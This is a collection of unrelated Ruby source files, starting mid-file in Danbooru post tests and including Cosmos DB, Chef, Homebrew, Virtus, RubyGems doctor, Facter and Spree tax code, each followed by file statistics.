@post.revert_to!(@post.versions.first)
end
assert(@post.valid?)
assert_equal(@post.versions.first.rating, @post.rating)
end
end
context "a post that has been updated" do
setup do
PostArchive.sqs_service.stubs(:merge?).returns(false)
@post = FactoryBot.create(:post, :rating => "q", :tag_string => "aaa", :source => "")
@post.reload
@post.update(:tag_string => "aaa bbb ccc ddd")
@post.reload
@post.update(:tag_string => "bbb xxx yyy", :source => "xyz")
@post.reload
@post.update(:tag_string => "bbb mmm yyy", :source => "abc")
@post.reload
end
context "and then reverted to an early version" do
setup do
@post.revert_to(@post.versions[1])
end
should "correctly revert all fields" do
assert_equal("aaa bbb ccc ddd", @post.tag_string)
assert_equal("", @post.source)
assert_equal("q", @post.rating)
end
end
context "and then reverted to a later version" do
setup do
@post.revert_to(@post.versions[-2])
end
should "correctly revert all fields" do
assert_equal("bbb xxx yyy", @post.tag_string)
assert_equal("xyz", @post.source)
assert_equal("q", @post.rating)
end
end
end
end
context "URLs:" do
should "generate the correct urls for animated gifs" do
@post = FactoryBot.build(:post, md5: "deadbeef", file_ext: "gif", tag_string: "animated_gif")
assert_equal("https://localhost/data/preview/deadbeef.jpg", @post.preview_file_url)
assert_equal("https://localhost/data/deadbeef.gif", @post.large_file_url)
assert_equal("https://localhost/data/deadbeef.gif", @post.file_url)
end
end
context "Notes:" do
context "#copy_notes_to" do
setup do
@src = FactoryBot.create(:post, image_width: 100, image_height: 100, tag_string: "translated partially_translated", has_embedded_notes: true)
@dst = FactoryBot.create(:post, image_width: 200, image_height: 200, tag_string: "translation_request")
create(:note, post: @src, x: 10, y: 10, width: 10, height: 10, body: "test")
create(:note, post: @src, x: 10, y: 10, width: 10, height: 10, body: "deleted", is_active: false)
@src.reload.copy_notes_to(@dst)
end
should "copy notes and tags" do
assert_equal(1, @dst.notes.active.length)
assert_equal(true, @dst.has_embedded_notes)
assert_equal("lowres partially_translated translated", @dst.tag_string)
end
should "rescale notes" do
note = @dst.notes.active.first
assert_equal([20, 20, 20, 20], [note.x, note.y, note.width, note.height])
end
end
end
context "#replace!" do
subject { @post.replace!(tags: "something", replacement_url: "https://danbooru.donmai.us/images/download-preview.png") }
setup do
@post = FactoryBot.create(:post)
@post.stubs(:queue_delete_files)
end
should "update the post" do
assert_changes(-> { @post.md5 }) do
subject
end
end
end
end
| 35.860065 | 149 | 0.607662 |
d5a5bb9038a55e5cb7052c6c9435c335036373fc | 3,268 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.

module Azure::Cosmosdb::Mgmt::V2020_04_01
  module Models
    #
    # An Azure Cosmos DB MongoDB collection.
    #
    class MongoDBCollectionGetResults < ARMResourceProperties

      include MsRestAzure

      # @return [MongoDBCollectionGetPropertiesResource] collection body,
      #   deserialized from the ARM payload's 'properties.resource' node.
      attr_accessor :resource

      # @return [MongoDBCollectionGetPropertiesOptions] collection options,
      #   deserialized from the ARM payload's 'properties.options' node.
      attr_accessor :options


      #
      # Mapper for MongoDBCollectionGetResults class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      # Note: the nested 'properties.*' serialized names flatten the ARM
      # "properties" envelope onto the top-level accessors above.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'MongoDBCollectionGetResults',
          type: {
            name: 'Composite',
            class_name: 'MongoDBCollectionGetResults',
            model_properties: {
              id: {
                client_side_validation: true,
                required: false,
                read_only: true,
                serialized_name: 'id',
                type: {
                  name: 'String'
                }
              },
              name: {
                client_side_validation: true,
                required: false,
                read_only: true,
                serialized_name: 'name',
                type: {
                  name: 'String'
                }
              },
              type: {
                client_side_validation: true,
                required: false,
                read_only: true,
                serialized_name: 'type',
                type: {
                  name: 'String'
                }
              },
              location: {
                client_side_validation: true,
                required: false,
                serialized_name: 'location',
                type: {
                  name: 'String'
                }
              },
              tags: {
                client_side_validation: true,
                required: false,
                serialized_name: 'tags',
                type: {
                  name: 'Dictionary',
                  value: {
                    client_side_validation: true,
                    required: false,
                    serialized_name: 'StringElementType',
                    type: {
                      name: 'String'
                    }
                  }
                }
              },
              resource: {
                client_side_validation: true,
                required: false,
                serialized_name: 'properties.resource',
                type: {
                  name: 'Composite',
                  class_name: 'MongoDBCollectionGetPropertiesResource'
                }
              },
              options: {
                client_side_validation: true,
                required: false,
                serialized_name: 'properties.options',
                type: {
                  name: 'Composite',
                  class_name: 'MongoDBCollectionGetPropertiesOptions'
                }
              }
            }
          }
        }
      end
    end
  end
end
| 29.441441 | 70 | 0.452264 |
219291715ab0fadd4d72394eaa3aa2eea60ba52f | 754 | require 'spec_helper'
# ChefSpec coverage for the cafe-core::common recipe.
describe 'cafe-core::common' do
  let(:chef_run) { ChefSpec::ServerRunner.new.converge(described_recipe) }

  it 'marks the common recipe as active' do
    expect(chef_run.node['cafe']['core']['common']['active']).to be true
  end

  # One example per baseline cookbook the common recipe pulls in.
  %w(ntp zsh vim).each do |dep|
    it "includes the #{dep}::default recipe" do
      expect(chef_run).to include_recipe("#{dep}::default")
    end
  end

  context 'when platform is ubuntu' do
    let(:chef_run) do
      runner = ChefSpec::ServerRunner.new(platform: 'ubuntu', version: '14.04')
      runner.converge(described_recipe)
    end

    it 'includes the apt::default recipe' do
      expect(chef_run).to include_recipe('apt::default')
    end
  end
end
4a84e8dfa9a41ed5a5393f5e8a0ea83f8a9f817b | 608 | cask 'barxtemp' do
version '1.3.2'
sha256 '85c8347ab8e7cbc8e7cf639317f3ff5df75feb9420bf94596dcfa05ac5914d16'

# github.com/Gabriele91/barXtemp was verified as official when first introduced to the cask
url "https://github.com/Gabriele91/barXtemp/releases/download/#{version}/barXtemp.app.zip"
# appcast + checkpoint let Homebrew detect new GitHub releases of the app.
appcast 'https://github.com/Gabriele91/barXtemp/releases.atom',
        checkpoint: '9b7756a504b6ce274e2efde312990f95bb831589f9bf6a21cb1ccfe5a7f55c86'
name 'barXtemp'
homepage 'https://gabriele91.github.io/barXtemp/'
license :mit

depends_on macos: '>= :mountain_lion'

app 'barXtemp.app'
end
| 35.764706 | 93 | 0.777961 |
26a107b6404784d24b7e648f844af2f7f8e810e5 | 824 | # -*- encoding: utf-8 -*-
require File.expand_path('../lib/angular_material/rails/version', __FILE__)

# Gem specification for angular-material-rails: packages the Angular
# Material assets for the Rails asset pipeline.
Gem::Specification.new do |s|
  s.name        = "angular-material-rails"
  s.version     = AngularMaterial::Rails::VERSION
  s.platform    = Gem::Platform::RUBY
  s.authors     = ["Alex Vangelov"]
  s.email       = ["[email protected]"]
  s.homepage    = "http://rubygems.org/gems/angular-material-rails"
  s.summary     = "Using Angular Material with Rails"
  s.description = "This gem adds Angular Material to Rails assets pipeline"
  s.licenses    = ["AV","MIT"]
  #s.required_rubygems_version = ">= 1.3.6"

  # Ship every git-tracked file; packaging therefore requires a git checkout.
  s.files = `git ls-files`.split("\n")
  # Install-time extension hook (runs ext/mkrf_conf.rb on `gem install`).
  s.extensions = 'ext/mkrf_conf.rb'
  s.require_path = 'lib'

  s.add_dependency "sprockets", ">3.0.0"
  s.add_dependency "rubyzip"
  #s.add_dependency "thor"
end | 34.333333 | 75 | 0.651699 |
08fe17e700ea98f9af2dc10379d976514c458d52 | 416 | # frozen_string_literal: true
# Join table linking services to the locations where they are offered.
# Uses UUID primary/foreign keys to match the referenced tables.
class CreateServiceAtLocations < ActiveRecord::Migration[5.2]
  def change
    create_table :service_at_locations, id: :uuid do |table|
      table.references :service,       foreign_key: true, type: :uuid
      table.references :location,      foreign_key: true, type: :uuid
      table.references :link_instance, foreign_key: true, type: :uuid
      table.string :description

      table.timestamps
    end
  end
end
| 27.733333 | 65 | 0.709135 |
18e5610dca8bcae4ca05c9ed74714d00dae6336e | 88 | module WebConsole
module REPL
  # Metadata for the Pry REPL adapter.
  class Pry
    # Adapter version string. Frozen so the shared constant cannot be
    # mutated by callers (standard practice for version constants).
    VERSION = "0.2.1".freeze
  end
end
end
| 11 | 23 | 0.602273 |
6a6b705bc2959be06f0f6cf0d6de43afe22233c3 | 357 | require 'ostruct'
require 'representable/json'
require 'viagogo/resource'
module Viagogo
  # Open-ended value object for geography payloads; OpenStruct lets the
  # API response carry arbitrary extra fields without schema changes.
  class Geography < OpenStruct
  end

  # Maps Geography to/from the API's PascalCase JSON keys.
  module GeographyRepresenter
    include Representable::JSON

    property :id, as: :Id
    property :name, as: :Name
    # Country is a nested resource parsed/rendered with its own representer.
    property :country, as: :Country, extend: Viagogo::ResourceRepresenter, class: Viagogo::Resource
  end
end
| 21 | 99 | 0.739496 |
d5fe07b1fc2c76bb2cae36f733dc731558f5089f | 69 | class CommunityRecommendationsController < ApplicationController
end
| 23 | 64 | 0.913043 |
f87ddd908e05c81c16a0f5c032dfcf0278f97db2 | 509 | # @todo Hack until https://github.com/opscode-cookbooks/php/pull/111 is
# included (overrides ext_conf_dir until the upstream php cookbook supports it).
node.override['php']['ext_conf_dir'] = "/etc/php5/mods-available"

include_recipe 'php'
include_recipe "apache2::mod_php5"

# PHP extension packages required by the stack.
%w[php5-gd php5-mysql php5-mcrypt php5-curl php5-dev].each do |php_pkg|
  package php_pkg do
    action :install
  end
end

# Drop our PHP overrides where Apache's SAPI reads them, and restart
# Apache at the end of the run so they take effect.
template "/etc/php5/apache2/conf.d/vdd_php.ini" do
  source "vdd_php.ini.erb"
  mode "0644"
  notifies :restart, "service[apache2]", :delayed
end
| 18.851852 | 71 | 0.685658 |
ffee7ce717fa6176dec95620197b0fdec1af41e3 | 4,777 | module Virtus
# Instance methods that are added when you include Virtus
module InstanceMethods

  # Adds an +initialize+ that accepts an attributes hash.
  module Constructor

    # Set attributes during initialization of an object
    #
    # @param [#to_hash] attributes
    #   the attributes hash to be set
    #
    # @return [undefined]
    #
    # @api private
    def initialize(attributes = nil)
      self.class.attribute_set.set(self, attributes) if attributes
      set_default_attributes
    end

  end # Constructor

  # Adds hash-style bulk reading and writing of attributes.
  module MassAssignment

    # Returns a hash of all publicly accessible attributes
    #
    # @example
    #   class User
    #     include Virtus
    #
    #     attribute :name, String
    #     attribute :age,  Integer
    #   end
    #
    #   user = User.new(:name => 'John', :age => 28)
    #   user.attributes # => { :name => 'John', :age => 28 }
    #
    # @return [Hash]
    #
    # @api public
    def attributes
      attribute_set.get(self)
    end
    alias_method :to_hash, :attributes

    # Mass-assign attribute values
    #
    # Keys in the +attributes+ param can be symbols or strings.
    # All referenced Attribute writer methods *will* be called.
    # Non-attribute setter methods on the receiver *will* be called.
    #
    # @example
    #   class User
    #     include Virtus
    #
    #     attribute :name, String
    #     attribute :age,  Integer
    #   end
    #
    #   user = User.new
    #   user.attributes = { :name => 'John', 'age' => 28 }
    #
    # @param [#to_hash] attributes
    #   a hash of attribute names and values to set on the receiver
    #
    # @return [Hash]
    #
    # @api public
    def attributes=(attributes)
      attribute_set.set(self, attributes)
    end

  end # MassAssignment

  # Returns a value of the attribute with the given name
  #
  # @example
  #   class User
  #     include Virtus
  #
  #     attribute :name, String
  #   end
  #
  #   user = User.new(:name => 'John')
  #   user[:name] # => "John"
  #
  # @param [Symbol] name
  #   a name of an attribute
  #
  # @return [Object]
  #   a value of an attribute
  #
  # @api public
  def [](name)
    public_send(name)
  end

  # Sets a value of the attribute with the given name
  #
  # @example
  #   class User
  #     include Virtus
  #
  #     attribute :name, String
  #   end
  #
  #   user = User.new
  #   user[:name] = "John" # => "John"
  #   user.name # => "John"
  #
  # @param [Symbol] name
  #   a name of an attribute
  #
  # @param [Object] value
  #   a value to be set
  #
  # @return [Object]
  #   the value set on an object
  #
  # @api public
  def []=(name, value)
    public_send("#{name}=", value)
  end

  # Freeze object
  #
  # Forces evaluation of all (including lazy) defaults first, since a
  # frozen instance could no longer memoize them afterwards.
  #
  # @return [self]
  #
  # @api public
  #
  # @example
  #
  #   class User
  #     include Virtus
  #
  #     attribute :name, String
  #     attribute :age,  Integer
  #   end
  #
  #   user = User.new(:name => 'John', :age => 28)
  #   user.frozen? # => false
  #   user.freeze
  #   user.frozen? # => true
  #
  # @api public
  def freeze
    set_default_attributes!
    super
  end

  # Reset an attribute to its default
  #
  # @return [self]
  #
  # @api public
  #
  # @example
  #
  #   class User
  #     include Virtus
  #
  #     attribute :age, Integer, default: 21
  #   end
  #
  #   user = User.new(:name => 'John', :age => 28)
  #   user.age = 30
  #   user.age # => 30
  #   user.reset_attribute(:age)
  #   user.age # => 21
  #
  # @api public
  def reset_attribute(attribute_name)
    attribute = attribute_set[attribute_name]
    attribute.set_default_value(self) if attribute
    self
  end

  # Set default attributes
  #
  # @return [self]
  #
  # @api private
  def set_default_attributes
    attribute_set.set_defaults(self)
    self
  end

  # Set default attributes even lazy ones
  #
  # @return [self]
  #
  # @api public
  def set_default_attributes!
    attribute_set.set_defaults(self, proc { |_| false })
    self
  end

  private

  # The list of allowed public methods
  #
  # @return [Array<String>]
  #
  # @api private
  def allowed_methods
    public_methods.map(&:to_s)
  end

  # @api private
  # Note: && binds tighter than ||, so :attribute_set is rejected
  # unconditionally, while :attributes is only rejected when the
  # receiver already responds to #attributes.
  def assert_valid_name(name)
    if respond_to?(:attributes) && name.to_sym == :attributes || name.to_sym == :attribute_set
      raise ArgumentError, "#{name.inspect} is not allowed as an attribute name"
    end
  end

end # module InstanceMethods
end # module Virtus
| 21.912844 | 96 | 0.538623 |
5d717a3a72d8b08b7478f5843d39ad2fe703a722 | 934 | cask 'flash-ppapi' do
version '28.0.0.137'
sha256 '46ed55fe6e464cdb2de97244cec77a26234ecb6c8de2e9a8d41a1e81e55ac5c6'

url "https://fpdownload.adobe.com/pub/flashplayer/pdc/#{version}/install_flash_player_osx_ppapi.dmg"
appcast 'http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/version_en_mac_pep.xml',
        checkpoint: '0e62296da997de154e620ca99f77fd9842641dbaf5970a8dc41dc927fedcc2cc'
name 'Adobe Flash Player PPAPI (plugin for Opera and Chromium)'
homepage 'https://get.adobe.com/flashplayer/otherversions/'

# The installed plugin updates itself, so Homebrew skips outdated checks.
auto_updates true

pkg 'Install Adobe Pepper Flash Player.app/Contents/Resources/Adobe Flash Player.pkg'

uninstall pkgutil: 'com.adobe.pkg.PepperFlashPlayer',
          delete: '/Library/Internet Plug-Ins/PepperFlashPlayer'

# Leftover caches/logs removed on `brew cask zap`.
zap trash: [
  '~/Library/Caches/Adobe/Flash Player',
  '~/Library/Logs/FlashPlayerInstallManager.log',
]
end
| 40.608696 | 104 | 0.745182 |
388b3985631279752cf3d5022018be07d967f52a | 1,348 | require_relative '../spec_helper'
describe "Skatelog" do
  describe "inheritance" do
    it "inherits from ActiveRecord::Base" do
      expect(Skatelog < ActiveRecord::Base).to be true
    end
  end

  describe "associations" do
    # Seed exactly one Skatelog owned by a known user before the examples run.
    before(:all) do
      Skatelog.destroy_all
      user = User.create(name: "Dramass", username: "Dramass", boardtype: "indo", password: "123")
      Skatelog.create(title: "Berkeley Skate Park Sesh", seshtime: "1 hour", tricks: "none", description: "Skating and hanging with patches", user_id: user.id)
      drama = User.find_by(username: "Dramass")
      Skatelog.delete_all
      Skatelog.create(
        title: "Berkeley Skate Park Sesh",
        seshtime: "1 hour",
        tricks: "none",
        description: "Skating and hanging with patches",
        user_id: drama.id
      )
    end

    describe "belongs to user" do
      describe "#user" do
        it "returns the skatelog's user" do
          log = Skatelog.first
          owner = User.find(log.user_id)
          expect(log.user).to eq owner
        end

        it "returns a User object" do
          log = Skatelog.first
          expect(log.user).to be_instance_of User
        end
      end
    end
  end
end
| 24.962963 | 159 | 0.590504 |
1cef52234e8dd96f6ad099e36aace378ac13dab8 | 4,055 | # frozen_string_literal: true
require 'rubygems/test_case'
require 'rubygems/doctor'
class TestGemDoctor < Gem::TestCase

  # Installs a minimal gem +name+ (with a lib file and a Rakefile) into the
  # test GEM_HOME and returns its specification.
  def gem(name)
    spec = quick_gem name do |gem|
      gem.files = %W[lib/#{name}.rb Rakefile]
    end

    write_file File.join(*%W[gems #{spec.full_name} lib #{name}.rb])
    write_file File.join(*%W[gems #{spec.full_name} Rakefile])

    spec
  end

  def test_doctor
    a = gem 'a'
    b = gem 'b'
    c = gem 'c'

    Gem.use_paths @userhome, @gemhome

    # Corrupt the repository: b loses its spec file, c's spec becomes
    # unevaluatable Ruby.
    FileUtils.rm b.spec_file

    File.open c.spec_file, 'w' do |io|
      io.write 'this will raise an exception when evaluated.'
    end

    assert_path_exists File.join(a.gem_dir, 'Rakefile')
    assert_path_exists File.join(a.gem_dir, 'lib', 'a.rb')

    assert_path_exists b.gem_dir
    refute_path_exists b.spec_file

    assert_path_exists c.gem_dir
    assert_path_exists c.spec_file

    doctor = Gem::Doctor.new @gemhome

    capture_io do
      use_ui @ui do
        doctor.doctor
      end
    end

    # Healthy gem a is untouched; orphaned dirs and broken specs are gone.
    assert_path_exists File.join(a.gem_dir, 'Rakefile')
    assert_path_exists File.join(a.gem_dir, 'lib', 'a.rb')

    refute_path_exists b.gem_dir
    refute_path_exists b.spec_file

    refute_path_exists c.gem_dir
    refute_path_exists c.spec_file

    expected = <<-OUTPUT
Checking #{@gemhome}
Removed file specifications/c-2.gemspec
Removed directory gems/b-2
Removed directory gems/c-2
    OUTPUT

    assert_equal expected, @ui.output

    # Doctoring must not change which paths Gem considers active.
    assert_equal Gem.dir, @userhome
    assert_equal Gem.path, [@gemhome, @userhome]
  end

  def test_doctor_dry_run
    a = gem 'a'
    b = gem 'b'
    c = gem 'c'

    Gem.use_paths @userhome, @gemhome

    FileUtils.rm b.spec_file

    File.open c.spec_file, 'w' do |io|
      io.write 'this will raise an exception when evaluated.'
    end

    assert_path_exists File.join(a.gem_dir, 'Rakefile')
    assert_path_exists File.join(a.gem_dir, 'lib', 'a.rb')

    assert_path_exists b.gem_dir
    refute_path_exists b.spec_file

    assert_path_exists c.gem_dir
    assert_path_exists c.spec_file

    # Second argument enables dry-run mode.
    doctor = Gem::Doctor.new @gemhome, true

    capture_io do
      use_ui @ui do
        doctor.doctor
      end
    end

    # Dry run: problems are reported but nothing is deleted.
    assert_path_exists File.join(a.gem_dir, 'Rakefile')
    assert_path_exists File.join(a.gem_dir, 'lib', 'a.rb')

    assert_path_exists b.gem_dir
    refute_path_exists b.spec_file

    assert_path_exists c.gem_dir
    assert_path_exists c.spec_file

    expected = <<-OUTPUT
Checking #{@gemhome}
Extra file specifications/c-2.gemspec
Extra directory gems/b-2
Extra directory gems/c-2
    OUTPUT

    assert_equal expected, @ui.output

    assert_equal Gem.dir, @userhome
    assert_equal Gem.path, [@gemhome, @userhome]
  end

  def test_doctor_non_gem_home
    other_dir = File.join @tempdir, 'other', 'dir'

    FileUtils.mkdir_p other_dir

    doctor = Gem::Doctor.new @tempdir

    capture_io do
      use_ui @ui do
        doctor.doctor
      end
    end

    # A directory that is not a gem repository must be left alone.
    assert_path_exists other_dir

    expected = <<-OUTPUT
Checking #{@tempdir}
This directory does not appear to be a RubyGems repository, skipping
    OUTPUT

    assert_equal expected, @ui.output
  end

  def test_doctor_child_missing
    doctor = Gem::Doctor.new @gemhome

    # Must be a no-op rather than raising when the sub-directory is absent.
    doctor.doctor_child 'missing', ''

    assert true # count
  end

  def test_doctor_badly_named_plugins
    gem 'a'

    Gem.use_paths @gemhome.to_s

    FileUtils.mkdir_p Gem.plugindir
    bad_plugin = File.join(Gem.plugindir, "a_badly_named_file.rb")
    write_file bad_plugin

    doctor = Gem::Doctor.new @gemhome

    capture_io do
      use_ui @ui do
        doctor.doctor
      end
    end

    # refute_path_exists bad_plugin

    expected = <<-OUTPUT
Checking #{@gemhome}
Removed file plugins/a_badly_named_file.rb
    OUTPUT

    assert_equal expected, @ui.output
  end

  def test_gem_repository_eh
    doctor = Gem::Doctor.new @gemhome

    refute doctor.gem_repository?, 'no gems installed'

    install_specs util_spec 'a'

    doctor = Gem::Doctor.new @gemhome

    assert doctor.gem_repository?, 'gems installed'
  end
end
| 20.794872 | 68 | 0.687793 |
21ead02bbd859b0449099f1fbecfab542c71db8d | 763 | # frozen_string_literal: true
module Facter
  # Filters the value inside a fact.
  # e.g. os.release.major is the user query, os.release is the fact
  # and major is the filter criteria inside the fact
  class FactFilter
    # Narrows each fact's value to the piece addressed by its filter
    # tokens (when the value supports #dig), after dropping legacy facts.
    def filter_facts!(searched_facts)
      filter_legacy_facts!(searched_facts)

      searched_facts.each do |searched_fact|
        diggable = searched_fact.filter_tokens.any? &&
                   searched_fact.value.respond_to?(:dig)
        searched_fact.value = diggable ? searched_fact.value.dig(*searched_fact.filter_tokens) : searched_fact.value
      end
    end

    private

    # Legacy facts are kept only when explicitly requested via options or
    # when the user asked for specific facts.
    def filter_legacy_facts!(resolved_facts)
      return if Options[:show_legacy]

      resolved_facts.reject!(&:legacy?) unless Options[:user_query]
    end
  end
end
| 27.25 | 79 | 0.630406 |
ed78ed46cae719b4799b5c5fecd9022aa540019e | 3,370 | # standard libraries
require "bundler"
require "digest"
require "fileutils"
require "forwardable"
require "json"
require "open3"
require "pathname"
require "set"
require "strscan"
require "tempfile"
require "time"
require "tmpdir"
require "uri"
require "yaml"
require "erb"
# 3rd-party libraries
require "aws-sdk-s3"
require "bugsnag"
require "git_diff_parser"
require "jsonseq"
require "nokogiri"
require "retryable"
require "strong_json"
require "parallel"
# application
require "runners/version"
require "runners/exitstatus"
require "runners/errors"
require "runners/tmpdir"
require "runners/config"
require "runners/config_generator"
require "runners/options"
require "runners/sensitive_filter"
require "runners/git_blame_info"
require "runners/location"
require "runners/results"
require "runners/issue"
require "runners/harness"
require "runners/analyzer"
require "runners/analyzers"
require "runners/io"
require "runners/io/aws_s3"
require "runners/trace_writer"
require "runners/changes"
require "runners/workspace"
require "runners/workspace/git"
require "runners/shell"
require "runners/command"
require "runners/warnings"
require "runners/ruby"
require "runners/ruby/gem_installer"
require "runners/ruby/gem_installer/spec"
require "runners/ruby/gem_installer/source"
require "runners/ruby/lockfile_loader"
require "runners/ruby/lockfile_loader/lockfile"
require "runners/ruby/lockfile_parser"
require "runners/rubocop_utils"
require "runners/nodejs"
require "runners/java"
require "runners/kotlin"
require "runners/php"
require "runners/python"
require "runners/swift"
require "runners/go"
require "runners/cplusplus"
require "runners/recommended_config"
require "runners/schema/options"
require "runners/schema/trace"
require "runners/schema/config"
require "runners/schema/result"
# processors
require "runners/processor"
require "runners/processor/actionlint"
require "runners/processor/brakeman"
require "runners/processor/checkstyle"
require "runners/processor/clang_tidy"
require "runners/processor/code_sniffer"
require "runners/processor/coffeelint"
require "runners/processor/cppcheck"
require "runners/processor/cpplint"
require "runners/processor/detekt"
require "runners/processor/eslint"
require "runners/processor/flake8"
require "runners/processor/fxcop"
require "runners/processor/golangci_lint"
require "runners/processor/goodcheck"
require "runners/processor/hadolint"
require "runners/processor/haml_lint"
require "runners/processor/javasee"
require "runners/processor/jshint"
require "runners/processor/ktlint"
require "runners/processor/languagetool"
require "runners/processor/metrics_codeclone"
require "runners/processor/metrics_complexity"
require "runners/processor/metrics_fileinfo"
require "runners/processor/misspell"
require "runners/processor/phinder"
require "runners/processor/phpmd"
require "runners/processor/pmd_cpd"
require "runners/processor/pmd_java"
require "runners/processor/pylint"
require "runners/processor/querly"
require "runners/processor/reek"
require "runners/processor/remark_lint"
require "runners/processor/rubocop"
require "runners/processor/scss_lint"
require "runners/processor/secret_scan"
require "runners/processor/shellcheck"
require "runners/processor/slim_lint"
require "runners/processor/stylelint"
require "runners/processor/swiftlint"
require "runners/processor/tyscan"
# Root namespace for the runner framework; every file required above
# defines its classes under this module.
module Runners
end
| 28.083333 | 47 | 0.821662 |
acb8631a33480ab590befbfe06eb7e92b0cef5a3 | 2,343 | # The MIT License (MIT)
# Copyright (c) 2018 Mike DeAngelo Looker Data Sciences, Inc.

# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:

# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.

# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

# End-to-end check that the installed `gzr` binary prints the expected
# help text for the attribute subcommands.
RSpec.describe "`gzr attribute` command", type: :cli do
  it "executes `gzr help attribute` command successfully" do
    # Shells out to the real executable; requires gzr on PATH.
    output = `gzr help attribute`
    # NOTE(review): heredoc content must match the CLI output byte for byte
    # (whitespace inside <<-OUT is significant) — confirm against `gzr help`.
    expected_output = <<-OUT
Commands:
gzr attribute cat ATTR_ID|ATTR_NAME # Output json information about an attribute to screen or file
gzr attribute create ATTR_NAME [ATTR_LABEL] [OPTIONS] # Create or modify an attribute
gzr attribute get_group_value GROUP_ID|GROUP_NAME ATTR_ID|ATTR_NAME # Retrieve a user attribute value for a group
gzr attribute help [COMMAND] # Describe subcommands or one specific subcommand
gzr attribute import FILE # Import a user attribute from a file
gzr attribute ls # List all the defined user attributes
gzr attribute rm ATTR_ID|ATTR_NAME # Delete a user attribute
gzr attribute set_group_value GROUP_ID|GROUP_NAME ATTR_ID|ATTR_NAME VALUE # Set a user attribute value for a group
    OUT
    expect(output).to eq(expected_output)
  end
end
| 57.146341 | 139 | 0.691848 |
39febdec5e17b28c924dfcbb081bfa3b1f160583 | 727 | require 'spec_helper'
RSpec.describe Onesignal do
  describe '.configure' do
    before { Onesignal.configure }

    it 'creates a new instance of Configuration' do
      expect(Onesignal.configuration).to be_a(Configuration)
    end

    context 'when configuration exists' do
      it 'does not create a new instance' do
        # Capture the memoized object, reconfigure, and verify it is reused.
        configuration = Onesignal.configuration
        Onesignal.configure
        expect(Onesignal.configuration).to eq(configuration)
      end
    end

    context 'when configuration block is given' do
      # Removed an unused `let(:logger) { 'test' }`: being lazy, it was
      # never referenced and therefore never evaluated — dead code.
      it 'yields the configuration object' do
        expect { |config| Onesignal.configure(&config) }.to yield_with_args(Configuration)
      end
    end
  end
end
| 25.964286 | 90 | 0.686382 |
1d0ddf44db4c1b638d0e5c7e76dc112f5a4490c7 | 173 | # frozen_string_literal: true
# Adds a flag controlling whether a role may view audit logs.
# Existing and newly created roles default to no access.
class AddReadAuditsToRole < ActiveRecord::Migration[4.2]
  def change
    add_column :roles, :read_audits, :boolean, default: false
  end
end
| 21.625 | 61 | 0.763006 |
79ae35ad5615ec56c7157930c3f8c84ac107eebb | 2,858 | # frozen_string_literal: true
module Spree
  # Relatively simple class used to apply a {Spree::Tax::OrderTax} to a
  # {Spree::Order}.
  #
  # This class will create or update adjustments on the taxed items and remove
  # any now inapplicable tax adjustments from the order.
  class OrderTaxation
    # Create a new order taxation.
    #
    # @param [Spree::Order] order the order to apply taxes to
    # @return [Spree::OrderTaxation] a {Spree::OrderTaxation} object
    def initialize(order)
      @order = order
    end

    # Apply taxes to the order.
    #
    # This method will create or update adjustments on all line items and
    # shipments in the order to reflect the appropriate taxes passed in. It
    # will also remove any now inapplicable tax adjustments.
    #
    # @param [Spree::Tax::OrderTax] taxes the taxes to apply to the order
    # @return [void]
    def apply(taxes)
      apply_item_taxes(@order.line_items, taxes.line_item_taxes)
      apply_item_taxes(@order.shipments, taxes.shipment_taxes)
    end

    private

    # Update adjustments for each item using taxes pre-grouped by item id.
    #
    # Grouping once up front avoids rescanning the whole tax list for every
    # item (the previous per-item `select` was O(items * taxes)).
    #
    # @private
    # @param [Enumerable] items the order's line items or shipments
    # @param [Array<Spree::Tax::ItemTax>] item_taxes calculated taxes for those items
    # @return [void]
    def apply_item_taxes(items, item_taxes)
      taxes_by_item_id = item_taxes.group_by(&:item_id)

      items.each do |item|
        update_adjustments(item, taxes_by_item_id.fetch(item.id, []))
      end
    end

    # Walk through the taxes for an item and update adjustments for it. Once
    # all of the taxes have been added as adjustments, remove any old tax
    # adjustments that weren't touched.
    #
    # @private
    # @param [#adjustments] item a {Spree::LineItem} or {Spree::Shipment}
    # @param [Array<Spree::Tax::ItemTax>] taxed_items a list of calculated taxes for an item
    # @return [void]
    def update_adjustments(item, taxed_items)
      tax_adjustments = item.adjustments.select(&:tax?)

      active_adjustments = taxed_items.map do |tax_item|
        update_adjustment(item, tax_item)
      end

      # Remove any tax adjustments tied to rates which no longer match.
      unmatched_adjustments = tax_adjustments - active_adjustments
      item.adjustments.destroy(unmatched_adjustments)
    end

    # Update or create a new tax adjustment on an item.
    #
    # @private
    # @param [#adjustments] item a {Spree::LineItem} or {Spree::Shipment}
    # @param [Spree::Tax::ItemTax] tax_item calculated taxes for an item
    # @return [Spree::Adjustment] the created or updated tax adjustment
    def update_adjustment(item, tax_item)
      tax_adjustment = item.adjustments.detect do |adjustment|
        adjustment.source == tax_item.tax_rate
      end

      tax_adjustment ||= item.adjustments.new(
        source: tax_item.tax_rate,
        order_id: item.order_id,
        label: tax_item.label,
        included: tax_item.included_in_price
      )

      tax_adjustment.update!(amount: tax_item.amount)
      tax_adjustment
    end
  end
end
| 34.853659 | 92 | 0.683345 |
5dae558b6e02719aafa659b57e4900d1bbc0ee71 | 8,666 | require 'test_helper'
# Bare controller used only as the target class for the MixinTest unit tests.
class MixinTestController < ActionController::Base
end
